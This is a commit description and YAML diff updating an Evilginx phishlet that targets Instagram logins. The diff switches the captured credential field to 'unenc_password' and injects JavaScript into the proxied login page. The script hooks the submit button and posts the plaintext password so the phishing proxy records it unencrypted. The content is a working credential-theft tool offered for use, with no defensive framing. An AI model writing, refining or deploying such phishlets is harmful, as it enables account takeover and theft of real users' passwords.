Update Instagram Phishlet - Unencoded Password

Since Instagram added an encryption tool on his passwords, the passwords are sended encoded and evilginx get it encoded. Just added a request in javascript to send anywhere the unencoded password and the evilginx get it unencoded.

phishlets/instagram.yaml

@@ -1,4 +1,4 @@
-author: '@prrrrinncee'
+author: '@charlesbel'
 min_ver: '2.3.0'
 proxy_hosts:
   - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true}
@@ -16,9 +16,30 @@ credentials:
     search: '(.*)'
     type: 'post'
   password:
-    key: 'pass'
+    key: 'unenc_password'
     search: '(.*)'
     type: 'post'
 login:
   domain: 'www.instagram.com'
   path: '/accounts/login'
+js_inject:
+  - trigger_domains: ["www.instagram.com"]
+    trigger_paths: ["/accounts/login"]
+    trigger_params: []
+    script: |
+      function onclickListener(){
+        var submit = document.querySelectorAll('button[type=submit]')[0];
+        submit.setAttribute("onclick", "sendPass()");
+        return;
+      }
+      function sendPass(){
+        var password = document.getElementsByName("password")[0].value;
+
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", '/accounts/login/ajax/', true);
+        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+        xhr.send("unenc_password="+encodeURIComponent(password));
+
+        return;
+      }
+      setTimeout(function(){ onclickListener(); }, 1000);